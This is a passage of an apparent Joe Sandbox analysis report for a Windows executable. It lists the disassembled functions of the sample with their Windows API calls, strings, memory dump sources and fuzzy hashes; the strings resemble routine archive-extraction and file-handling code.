                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: f1be50d6d153254c7dfe3c660f2ac873751ac46d0b35fd1a8ceb76668f134aba
                                                                                            • Instruction ID: 4c2e31887aaa4e1e194232543c802cf9197acf308eea37306977886ea74cdba9
                                                                                            • Opcode Fuzzy Hash: f1be50d6d153254c7dfe3c660f2ac873751ac46d0b35fd1a8ceb76668f134aba
                                                                                            • Instruction Fuzzy Hash: 0EA011EE2AA002BC3008A2A0AE02C3B022CE0C0B20330AA2EF80280080A88008000832
                                                                                            Function 00A4E569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 2cfc5550a065e36e365258a9776644410d69468ba56811d5c5054dc9227d8228
                                                                                            • Instruction ID: a05bd30e01f422110175cfab7a3fe8b4dbe6f058198943dd62a27db864233eb8
                                                                                            • Opcode Fuzzy Hash: 2cfc5550a065e36e365258a9776644410d69468ba56811d5c5054dc9227d8228
                                                                                            • Instruction Fuzzy Hash: 45A001EEAA9542BC7908A656AE06C3B462DE8C6F65370A92EF85784481A8801C451976
                                                                                            Function 00A4E573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E580
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: bfb624c8b08d93f991aeb27da6f7eaf702a2679625472a466e2be0ef5771dbf9
                                                                                            • Instruction ID: be07c0c3af1ef4486737e121a5296ea59dacbe432a610d4a293204c1188973cb
                                                                                            • Opcode Fuzzy Hash: bfb624c8b08d93f991aeb27da6f7eaf702a2679625472a466e2be0ef5771dbf9
                                                                                            • Instruction Fuzzy Hash: 71A011EE2AA0003C3008A2A0AE02C3B022CE0C0B22330AA2EF80280080A8800A000832
                                                                                            Function 00A4E541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 734a8750668cf4124e0157dacc0a93d465654177ebba4389ef5ca15a196cb0fe
                                                                                            • Instruction ID: a05bd30e01f422110175cfab7a3fe8b4dbe6f058198943dd62a27db864233eb8
                                                                                            • Opcode Fuzzy Hash: 734a8750668cf4124e0157dacc0a93d465654177ebba4389ef5ca15a196cb0fe
                                                                                            • Instruction Fuzzy Hash: 45A001EEAA9542BC7908A656AE06C3B462DE8C6F65370A92EF85784481A8801C451976
                                                                                            Function 00A4E555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: 81bd5e846b49408b73ee6cdc4d64d2e38336ccbff60146bab029d33fe0766a4e
                                                                                            • Instruction ID: a05bd30e01f422110175cfab7a3fe8b4dbe6f058198943dd62a27db864233eb8
                                                                                            • Opcode Fuzzy Hash: 81bd5e846b49408b73ee6cdc4d64d2e38336ccbff60146bab029d33fe0766a4e
                                                                                            • Instruction Fuzzy Hash: 45A001EEAA9542BC7908A656AE06C3B462DE8C6F65370A92EF85784481A8801C451976
                                                                                            Function 00A4E55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00A4E51F
                                                                                              • Part of subcall function 00A4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A4E8D0
                                                                                              • Part of subcall function 00A4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A4E8E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                            • String ID:
                                                                                            • API String ID: 1269201914-0
                                                                                            • Opcode ID: d2a4b1a162230d59c2f536f96f4a803bd32e1b7321c5097636c078a3405c8716
                                                                                            • Instruction ID: a05bd30e01f422110175cfab7a3fe8b4dbe6f058198943dd62a27db864233eb8
                                                                                            • Opcode Fuzzy Hash: d2a4b1a162230d59c2f536f96f4a803bd32e1b7321c5097636c078a3405c8716
                                                                                            • Instruction Fuzzy Hash: 45A001EEAA9542BC7908A656AE06C3B462DE8C6F65370A92EF85784481A8801C451976
                                                                                            Function 00A39F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNELBASE(?,00A3903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00A39F0C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File
                                                                                            • String ID:
                                                                                            • API String ID: 749574446-0
                                                                                            • Opcode ID: 407e3b615c0e84ece82aae9d33c1799e8f55457f6f46f45ce1481ea66c5a8f41
                                                                                            • Instruction ID: 3ac474c01533fa234f63777b6fc156ae91a2cc6134bc641ecca9cfe170b97261
                                                                                            • Opcode Fuzzy Hash: 407e3b615c0e84ece82aae9d33c1799e8f55457f6f46f45ce1481ea66c5a8f41
                                                                                            • Instruction Fuzzy Hash: 77A0113008800A8A8E002B30CA0800C3B30EB20BC830202A8A00ACA0A2CB22880B8A00
                                                                                            Function 00A4AC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00A4AE72,C:\Users\user\Desktop,00000000,00A7946A,00000006), ref: 00A4AC08
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            • Opcode ID: b4857599b4757b2cc9c6a2af87c45e3c5c26862e306b54bb435444178594c4f9
                                                                                            • Instruction ID: 52afa4c205b70fddbb1793c42c4a9a6addfee6217a70ce08484d0d8fe4d4993e
                                                                                            • Opcode Fuzzy Hash: b4857599b4757b2cc9c6a2af87c45e3c5c26862e306b54bb435444178594c4f9
                                                                                            • Instruction Fuzzy Hash: 2EA011322002008BAA008B328F0AA0EBAAAAFA2B00F00C028A00080030CB30C822AA00
                                                                                            Function 00A39620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(000000FF,?,?,00A395D6,?,?,?,?,?,00A62641,000000FF), ref: 00A3963B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            • Opcode ID: ce9cf64f8bb5e1b15d7bd1702bc8909ca78dbc9ae897e689b7d328ecde00a974
                                                                                            • Instruction ID: 82e66fb11ad68f6183c65300d8a36a5cf294bc790ef720c99431e0fd07157240
                                                                                            • Opcode Fuzzy Hash: ce9cf64f8bb5e1b15d7bd1702bc8909ca78dbc9ae897e689b7d328ecde00a974
                                                                                            • Instruction Fuzzy Hash: 80F08971482B159FDB308B64C85B793B7E86B12321F045B1EE0E6429E0E7A1698E8A40

                                                                                            Non-executed Functions

                                                                                            Function 00A4C220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00A31316: GetDlgItem.USER32(00000000,00003021), ref: 00A3135A
                                                                                              • Part of subcall function 00A31316: SetWindowTextW.USER32(00000000,00A635F4), ref: 00A31370
                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A4C2B1
                                                                                            • EndDialog.USER32(?,00000006), ref: 00A4C2C4
                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 00A4C2E0
                                                                                            • SetFocus.USER32(00000000), ref: 00A4C2E7
                                                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A4C321
                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A4C358
                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00A4C36E
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A4C38C
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A4C39C
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A4C3B8
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A4C3D4
                                                                                            • _swprintf.LIBCMT ref: 00A4C404
                                                                                              • Part of subcall function 00A34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A340A5
                                                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A4C417
                                                                                            • FindClose.KERNEL32(00000000), ref: 00A4C41E
                                                                                            • _swprintf.LIBCMT ref: 00A4C477
                                                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A4C48A
                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A4C4A7
                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A4C4C7
                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A4C4D7
                                                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A4C4F1
                                                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A4C509
                                                                                            • _swprintf.LIBCMT ref: 00A4C535
                                                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A4C548
                                                                                            • _swprintf.LIBCMT ref: 00A4C59C
                                                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A4C5AF
                                                                                              • Part of subcall function 00A4AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A4AF35
                                                                                              • Part of subcall function 00A4AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A6E72C,?,?), ref: 00A4AF84
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                            • API String ID: 797121971-1840816070
                                                                                            • Opcode ID: bbc88beabe6255e8ac7488c34418fdf576e08cbd66369510f30ccb3eb9802c25
                                                                                            • Instruction ID: 72c225d30d10d11360a791eed819784641a2dcaac2c6a8fd1b841aca75ad7ab9
                                                                                            • Opcode Fuzzy Hash: bbc88beabe6255e8ac7488c34418fdf576e08cbd66369510f30ccb3eb9802c25
                                                                                            • Instruction Fuzzy Hash: FF91B472248344BFD661DBE0CD49FFB77BCEB8AB00F004919F649D6091DBB5AA058762
                                                                                            Function 00A36FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 00A36FAA
                                                                                            • _wcslen.LIBCMT ref: 00A37013
                                                                                            • _wcslen.LIBCMT ref: 00A37084
                                                                                              • Part of subcall function 00A37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00A37AAB
                                                                                              • Part of subcall function 00A37A9C: GetLastError.KERNEL32 ref: 00A37AF1
                                                                                              • Part of subcall function 00A37A9C: CloseHandle.KERNEL32(?), ref: 00A37B00
                                                                                              • Part of subcall function 00A3A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641,000000FF), ref: 00A3A1F1
                                                                                              • Part of subcall function 00A3A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00A3977F,?,?,00A395CF,?,?,?,?,?,00A62641), ref: 00A3A21F
                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00A37139
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A37155
                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00A37298
                                                                                              • Part of subcall function 00A39DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A373BC,?,?,?,00000000), ref: 00A39DBC
                                                                                              • Part of subcall function 00A39DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00A39E70
                                                                                              • Part of subcall function 00A39620: CloseHandle.KERNELBASE(000000FF,?,?,00A395D6,?,?,?,?,?,00A62641,000000FF), ref: 00A3963B
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A501
                                                                                              • Part of subcall function 00A3A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00A3A325,?,?,?,00A3A175,?,00000001,00000000,?,?), ref: 00A3A532
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                            • API String ID: 3983180755-3508440684
                                                                                            • Opcode ID: 4c0771510650aaff35ffd27e0a3ef0b399a46694d9a39ccce6d748ee666a7bcc
                                                                                            • Instruction ID: d269c5113b13d6ac4729114a0424bc359a5e9d39a63de02bffb7a1b07e1b2570
                                                                                            • Opcode Fuzzy Hash: 4c0771510650aaff35ffd27e0a3ef0b399a46694d9a39ccce6d748ee666a7bcc
                                                                                            • Instruction Fuzzy Hash: 9DC1E6B1D04648AADB35DBB4DD82FEEB3B8BF04300F008559F956E7182D774AA49CB61
                                                                                            Function 00A5D8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: __floor_pentium4
                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                            • API String ID: 4168288129-2761157908
                                                                                            • Opcode ID: 37603bb9d6a49458e178f11224242955df96e64d4a4392dd190c625489000770
                                                                                            • Instruction ID: 1d320d00437da780917be0f680a0a91a11e0f9c7e3b37d9ef24371a4629d04db
                                                                                            • Opcode Fuzzy Hash: 37603bb9d6a49458e178f11224242955df96e64d4a4392dd190c625489000770
                                                                                            • Instruction Fuzzy Hash: 91C21B71E046298FDB29CF289D407EAB7B5FB44306F1541EAD84DE7240E775AE898F40
                                                                                            Function 00A332F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1670744147.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1670726131.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670772587.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670807882.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1670977698.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_a30000_HMhdtzxEHf.jbxd
                                                                                            Similarity
                                                                                            • API ID: H_prolog_swprintf
                                                                                            • String ID: CMT$h%u$hc%u
                                                                                            • API String ID: 146138363-3282847064
                                                                                            • Opcode ID: e6928bcc90eab2cfcf8b27ce483ae9c096e50c6db4300d818a02c50e0346326c
                                                                                            • Instruction ID: 1a5e6dd1d62789621d403bff4302d4f4d90f03d712de24bcb2f0eb320c251c84
                                                                                            • Opcode Fuzzy Hash: e6928bcc90eab2cfcf8b27ce483ae9c096e50c6db4300d818a02c50e0346326c
                                                                                            • Instruction Fuzzy Hash: 8132E872514384AFDF18DF74C996BEA37A5AF15300F04447EFD8A9B282DB749A49CB20
